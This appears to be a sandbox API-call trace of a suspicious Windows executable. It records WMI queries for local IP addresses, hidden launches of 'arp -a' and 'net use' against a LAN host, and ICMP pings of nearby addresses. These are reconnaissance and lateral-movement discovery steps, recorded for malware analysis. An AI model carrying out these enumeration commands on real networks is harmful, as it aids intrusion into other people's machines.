WbemDefPath:IClassFactory:CreateInstance (in: This=0x5223608, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x5224190) returned 0x0 [0197.633] WbemDefPath:IUnknown:Release (This=0x5223608) returned 0x0 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x5224190) returned 0x0 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.633] WbemDefPath:IUnknown:AddRef (This=0x5224190) returned 0x3 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.633] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x7680f8) returned 0x0 [0197.634] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7680f8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.634] WbemDefPath:IUnknown:Release (This=0x7680f8) returned 0x3 [0197.634] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.634] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.634] WbemDefPath:IUnknown:Release (This=0x5224190) returned 0x2 [0197.634] WbemDefPath:IUnknown:Release (This=0x5224190) returned 0x1 [0197.634] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.634] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.634] WbemDefPath:IUnknown:QueryInterface (in: This=0x5224190, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x5224190) returned 0x0 [0197.634] WbemDefPath:IUnknown:AddRef (This=0x5224190) returned 0x3 [0197.634] WbemDefPath:IUnknown:Release (This=0x5224190) returned 0x2 [0197.634] WbemDefPath:IWbemPath:SetText (This=0x5224190, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=12") returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.634] IWbemClassObject:Get (in: This=0x5224d28, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257d038*=0, plFlavor=0x257d03c*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x257d038*=11, plFlavor=0x257d03c*=0) returned 0x0 [0197.634] IWbemClassObject:Get (in: This=0x5224d28, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257d038*=11, plFlavor=0x257d03c*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x257d038*=11, plFlavor=0x257d03c*=0) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.634] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.635] IWbemClassObject:Get (in: This=0x5224d28, wszName="IPAddress", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257d110*=0, plFlavor=0x257d114*=0 | out: pVal=0x26e7f0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x700f18*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x768138, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x257d110*=8200, plFlavor=0x257d114*=0) returned 0x0 [0197.635] SysStringByteLen (bstr="192.168.0.251") returned 0x1a [0197.635] SysStringByteLen (bstr="192.168.0.251") returned 0x1a [0197.635] SysStringByteLen (bstr="fe80::f412:d400:ac94:8eed") returned 0x32 [0197.635] SysStringByteLen (bstr="fe80::f412:d400:ac94:8eed") returned 0x32 [0197.635] IWbemClassObject:Get (in: This=0x5224d28, wszName="IPAddress", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257d110*=8200, plFlavor=0x257d114*=0 | out: pVal=0x26e7f8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x700f18*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x768138, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x257d110*=8200, plFlavor=0x257d114*=0) returned 0x0 [0197.635] SysStringByteLen (bstr="192.168.0.251") returned 0x1a [0197.635] SysStringByteLen (bstr="192.168.0.251") returned 0x1a [0197.635] SysStringByteLen (bstr="fe80::f412:d400:ac94:8eed") returned 0x32 [0197.635] SysStringByteLen (bstr="fe80::f412:d400:ac94:8eed") returned 0x32 [0197.636] CoTaskMemAlloc (cb=0x4) returned 0x768138 [0197.636] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x768138, puReturned=0x2576450 | out: apObjects=0x768138*=0x0, puReturned=0x2576450*=0x0) returned 0x1 [0197.636] CoTaskMemFree (pv=0x768138) [0197.637] CoGetContextToken (in: pToken=0x26e728 | out: pToken=0x26e728) returned 0x0 [0197.637] WbemLocator:IUnknown:Release (This=0x74046c) returned 0x1 [0197.637] IUnknown:Release (This=0x5210bbc) returned 0x0 [0198.645] CreatePipe (in: hReadPipe=0x26e720, hWritePipe=0x26e71c, lpPipeAttributes=0x26e6a0, nSize=0x0 | out: hReadPipe=0x26e720*=0x544, hWritePipe=0x26e71c*=0x54c) returned 1 [0198.645] GetCurrentProcess () returned 0xffffffff [0198.645] GetCurrentProcess () returned 0xffffffff [0198.645] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x544, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e724, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e724*=0x530) returned 1 [0198.645] CloseHandle (hObject=0x544) returned 1 [0198.645] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0198.645] CoTaskMemAlloc (cb=0x20e) returned 0x7348c0 [0198.645] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7348c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0198.646] CoTaskMemFree (pv=0x7348c0) [0198.646] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"arp\" -a", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e688*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x54c, hStdError=0x0), lpProcessInformation=0x257db98 | out: lpCommandLine="\"arp\" -a", lpProcessInformation=0x257db98*(hProcess=0x4c0, hThread=0x544, dwProcessId=0xf00, dwThreadId=0x11fc)) returned 1 [0199.519] CloseHandle (hObject=0x54c) returned 1 [0199.519] GetFileType (hFile=0x530) returned 0x3 [0199.519] CloseHandle (hObject=0x544) returned 1 [0199.519] ReadFile (in: hFile=0x530, lpBuffer=0x720e900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e7e4, lpOverlapped=0x0 | out: lpBuffer=0x720e900*, lpNumberOfBytesRead=0x26e7e4*=0x1b4, lpOverlapped=0x0) returned 1 [0200.099] ReadFile (in: hFile=0x530, lpBuffer=0x720e900, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e7e4, lpOverlapped=0x0 | out: lpBuffer=0x720e900, lpNumberOfBytesRead=0x26e7e4*=0x0, lpOverlapped=0x0) returned 0 [0200.102] CloseHandle (hObject=0x4c0) returned 1 [0200.146] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x26e604 | out: lpWSAData=0x26e604) returned 0 [0200.154] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4dc [0200.296] setsockopt (s=0x4dc, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0200.296] closesocket (s=0x4dc) returned 0 [0200.296] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x4dc [0200.686] setsockopt (s=0x4dc, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0200.686] closesocket (s=0x4dc) returned 0 [0201.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", nBufferLength=0x105, lpBuffer=0x26e16c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", lpFilePart=0x0) returned 0x4d [0201.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", nBufferLength=0x105, lpBuffer=0x26e118, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", lpFilePart=0x0) returned 0x4d [0201.207] GetCurrentProcess () returned 0xffffffff [0201.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e4c0 | out: TokenHandle=0x26e4c0*=0x4dc) returned 1 [0201.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x26dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0201.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x26e4c0 | out: lpFileInformation=0x26e4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0201.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x26df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0201.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x26e4c0 | out: lpFileInformation=0x26e4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0201.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x26def8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0201.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e3ec) returned 1 [0201.214] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3c8 [0201.214] GetFileType (hFile=0x3c8) returned 0x1 [0201.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e3e8) returned 1 [0201.214] GetFileType (hFile=0x3c8) returned 0x1 [0201.239] GetFileSize (in: hFile=0x3c8, lpFileSizeHigh=0x26e4b4 | out: lpFileSizeHigh=0x26e4b4*=0x0) returned 0x8c8f [0201.239] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e470, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e470*=0x1000, lpOverlapped=0x0) returned 1 [0201.247] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e30c, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e30c*=0x1000, lpOverlapped=0x0) returned 1 [0201.252] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e1c0, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e1c0*=0x1000, lpOverlapped=0x0) returned 1 [0201.252] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e1c0, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e1c0*=0x1000, lpOverlapped=0x0) returned 1 [0201.252] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e1c0, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e1c0*=0x1000, lpOverlapped=0x0) returned 1 [0201.253] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e0f8, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e0f8*=0x1000, lpOverlapped=0x0) returned 1 [0201.254] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e274, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e274*=0x1000, lpOverlapped=0x0) returned 1 [0201.255] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e188, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e188*=0x1000, lpOverlapped=0x0) returned 1 [0201.255] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e188, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e188*=0xc8f, lpOverlapped=0x0) returned 1 [0201.255] ReadFile (in: hFile=0x3c8, lpBuffer=0x72455c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e248, lpOverlapped=0x0 | out: lpBuffer=0x72455c8*, lpNumberOfBytesRead=0x26e248*=0x0, lpOverlapped=0x0) returned 1 [0201.256] CloseHandle (hObject=0x3c8) returned 1 [0201.256] GetCurrentProcess () returned 0xffffffff [0201.256] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e5f4 | out: TokenHandle=0x26e5f4*=0x3c8) returned 1 [0201.257] GetCurrentProcess () returned 0xffffffff [0201.257] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e5f4 | out: TokenHandle=0x26e5f4*=0x3f8) returned 1 [0201.257] GetCurrentProcess () returned 0xffffffff [0201.257] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e4c0 | out: TokenHandle=0x26e4c0*=0x45c) returned 1 [0201.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x26e4c0 | out: lpFileInformation=0x26e4c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0201.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", nBufferLength=0x105, lpBuffer=0x26df6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config", lpFilePart=0x0) returned 0x4d [0201.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x26e4c0 | out: lpFileInformation=0x26e4c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0201.258] GetCurrentProcess () returned 0xffffffff [0201.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e5f4 | out: TokenHandle=0x26e5f4*=0x470) returned 1 [0201.259] GetCurrentProcess () returned 0xffffffff [0201.259] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e5f4 | out: TokenHandle=0x26e5f4*=0x43c) returned 1 [0201.338] GetCurrentProcess () returned 0xffffffff [0201.338] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e3bc | out: TokenHandle=0x26e3bc*=0x334) returned 1 [0201.346] GetCurrentProcess () returned 0xffffffff [0201.346] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e3cc | out: TokenHandle=0x26e3cc*=0x2e8) returned 1 [0201.387] IcmpCreateFile () returned 0x78a4b0 [0201.395] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0201.395] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x776218 [0201.396] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0xfb00a8c0, RequestData=0x776218, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x1 [0201.400] LocalFree (hMem=0x776218) returned 0x0 [0201.404] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0201.405] LocalFree (hMem=0x6170048) returned 0x0 [0201.405] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0201.406] CreatePipe (in: hReadPipe=0x26e760, hWritePipe=0x26e75c, lpPipeAttributes=0x26e6e0, nSize=0x0 | out: hReadPipe=0x26e760*=0x2e4, hWritePipe=0x26e75c*=0x36c) returned 1 [0201.406] GetCurrentProcess () returned 0xffffffff [0201.406] GetCurrentProcess () returned 0xffffffff [0201.406] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e764, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e764*=0x368) returned 1 [0201.406] CloseHandle (hObject=0x2e4) returned 1 [0201.406] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0201.406] CoTaskMemAlloc (cb=0x20e) returned 0x7348c0 [0201.406] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7348c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0201.406] CoTaskMemFree (pv=0x7348c0) [0201.406] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" use \\\\192.168.0.251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e6a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x36c, hStdError=0x0), lpProcessInformation=0x7261288 | out: lpCommandLine="\"net.exe\" use \\\\192.168.0.251", lpProcessInformation=0x7261288*(hProcess=0x374, hThread=0x2e4, dwProcessId=0xcf8, dwThreadId=0x284)) returned 1 [0201.412] CloseHandle (hObject=0x36c) returned 1 [0201.412] GetFileType (hFile=0x368) returned 0x3 [0201.412] CloseHandle (hObject=0x2e4) returned 1 [0201.413] IcmpCreateFile () returned 0x78a4b0 [0201.458] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0201.458] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0201.458] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0x100a8c0, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0206.184] LocalFree (hMem=0x7762b8) returned 0x0 [0206.184] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0206.186] LocalFree (hMem=0x6170048) returned 0x0 [0206.186] IcmpCreateFile () returned 0x78a4b0 [0206.188] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0206.188] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0206.188] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0xff00a8c0, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0211.192] LocalFree (hMem=0x7762b8) returned 0x0 [0211.192] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 [0211.193] LocalFree (hMem=0x6170048) returned 0x0 [0211.194] IcmpCreateFile () returned 0x78a4b0 [0211.195] LocalAlloc (uFlags=0x0, uBytes=0x100ff) returned 0x6170048 [0211.195] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x7762b8 [0211.195] IcmpSendEcho2 (in: IcmpHandle=0x78a4b0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, DestinationAddress=0x160000e0, RequestData=0x7762b8, RequestSize=0x20, RequestOptions=0x26e7e4, ReplyBuffer=0x6170048, ReplySize=0x100ff, Timeout=0x1388 | out: ReplyBuffer=0x6170048) returned 0x0 [0216.186] LocalFree (hMem=0x7762b8) returned 0x0 [0216.186] IcmpCloseHandle (IcmpHandle=0x78a4b0) returned 1 